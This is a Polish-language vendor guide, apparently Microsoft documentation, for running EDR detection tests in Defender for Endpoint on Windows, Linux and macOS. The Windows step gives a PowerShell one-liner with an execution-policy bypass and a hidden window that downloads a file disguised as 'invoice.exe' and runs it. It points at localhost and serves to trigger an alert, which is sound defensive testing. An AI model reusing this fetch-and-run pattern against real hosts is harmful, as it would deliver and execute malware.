Test wykrywania EDR na potrzeby weryfikowania usług dołączania i raportowania urządzenia
Dotyczy:
Wymagania i konfiguracja scenariusza
- Windows 11, Windows 10 wersji 1709 kompilacji 16273 lub nowszej, Windows 8.1 lub Windows 7 z dodatkiem SP1.
- Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2 i Windows Server 2008 R2 SP1.
- Linux
- macOS
- Ochrona punktu końcowego w usłudze Microsoft Defender
- Ochrona punktu końcowego w usłudze Microsoft Defender na Linuxie
Wykrywanie punktów końcowych i reagowanie na nie dla punktu końcowego zapewnia zaawansowane wykrywanie ataków, które są niemal w czasie rzeczywistym i umożliwiają podjęcie działań. Analitycy zabezpieczeń mogą efektywnie ustalać priorytety alertów, uzyskiwać wgląd w pełny zakres naruszenia i podejmować działania reagowania w celu skorygowania zagrożeń.
Uruchom test wykrywania EDR, aby sprawdzić, czy urządzenie jest prawidłowo dołączone i raportuje do usługi. Wykonaj następujące kroki na nowo dołączonym urządzeniu:
System Windows
Otwieranie okna wiersza polecenia
W wierszu polecenia skopiuj i uruchom następujące polecenie. Okno wiersza polecenia zostanie zamknięte automatycznie.
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
Jeśli test wykrywania zakończy się pomyślnie, zostanie oznaczony jako ukończony, a nowy alert pojawi się w ciągu kilku minut.
Linux
- Pobieranie pliku skryptu na dołączony serwer z systemem Linux
curl -o ~/Downloads/MDE-Linux-EDR-DIY.zip -L https://aka.ms/MDE-Linux-EDR-DIY
- Wyodrębnij zamek błyskawiczny
unzip ~/Downloads/MDE-Linux-EDR-DIY.zip
- Uruchom następujące polecenie, aby nadać skryptowi uprawnienie wykonywalne:
chmod +x ./mde_linux_edr_diy.sh
- Uruchom następujące polecenie, aby wykonać skrypt:
./mde_linux_edr_diy.sh
- Po kilku minutach należy podnieść wykrywanie w Microsoft Defender XDR. Przyjrzyj się szczegółom alertu, osi czasu maszyny i wykonaj typowe kroki badania.
macOS
W przeglądarce Microsoft Edge dla komputerów Mac lub Safari pobierz DIY.zipMDATP dla systemu MacOS i wyodrębnij go.https://aka.ms/mdatpmacosdiy
Zostanie wyświetlony następujący monit:
Czy chcesz zezwolić na pobieranie na "mdatpclientanalyzer.blob.core.windows.net"?
Możesz zmienić witryny internetowe, które mogą pobierać pliki w preferencjach witryn sieci Web.Kliknij pozycję Zezwalaj.
Otwórz pliki do pobrania.
Musisz być w stanie zobaczyć MDATP MacOS DIY.
Porada
Po dwukrotnym kliknięciu przycisku MDATP dla systemu MacOS DIY zostanie wyświetlony następujący komunikat:
Nie można otworzyć "MDATP MacOS DIY", ponieważ deweloper nie może być weryfikatorem.
System macOS nie może sprawdzić, czy ta aplikacja jest wolna od złośliwego oprogramowania.
[Przenieś do kosza][Anuluj]Kliknij przycisk Anuluj.
Kliknij prawym przyciskiem myszy pozycję MDATP Dla systemu MacOS DIY, a następnie kliknij przycisk Otwórz.
System wyświetla następujący komunikat:
System macOS nie może zweryfikować dewelopera funkcji MDATP dla systemu MacOS DIY. Czy na pewno chcesz go otworzyć?
Otwarcie tej aplikacji spowoduje zastąpienie zabezpieczeń systemu, które mogą uwidoczniać komputer i dane osobowe złośliwemu oprogramowaniu, które może zaszkodzić twojemu komputerowi Mac lub naruszyć twoją prywatność.Kliknij przycisk Otwórz.
System wyświetli następujący komunikat:
Ochrona punktu końcowego w usłudze Microsoft Defender — plik testowy diy systemu macOS EDR
Odpowiedni alert będzie dostępny w portalu MDATP.Kliknij przycisk Otwórz.
W ciągu kilku minut zostanie zgłoszony alert testu EDR systemu macOS .
Przejdź do portalu Microsoft Defender (https://security.microsoft.com/).
Przejdź do kolejki alertów .
Alert testowy EDR systemu macOS pokazuje ważność, kategorię, źródło wykrywania i zwinięte menu akcji.
Przyjrzyj się szczegółom alertu i osi czasu urządzenia i wykonaj regularne kroki badania.
Następne kroki
Jeśli występują problemy ze zgodnością lub wydajnością aplikacji, możesz rozważyć dodanie wykluczeń. Aby uzyskać więcej informacji, zobacz następujące artykuły:
- Konfigurowanie i weryfikowanie wykluczeń dla Ochrona punktu końcowego w usłudze Microsoft Defender w systemie macOS
- Rozwiązywanie problemów z wynikami fałszywie pozytywnymi/negatywnymi w ochronie punktu końcowego w usłudze Microsoft Defender
- Zarządzaj regułami pomijania
- Tworzenie wskaźników naruszenia zabezpieczeń (IoC)
- Tworzenie niestandardowych reguł wykrywania i zarządzanie nimi
Zapoznaj się również z przewodnikiem po operacjach zabezpieczeń Ochrona punktu końcowego w usłudze Microsoft Defender.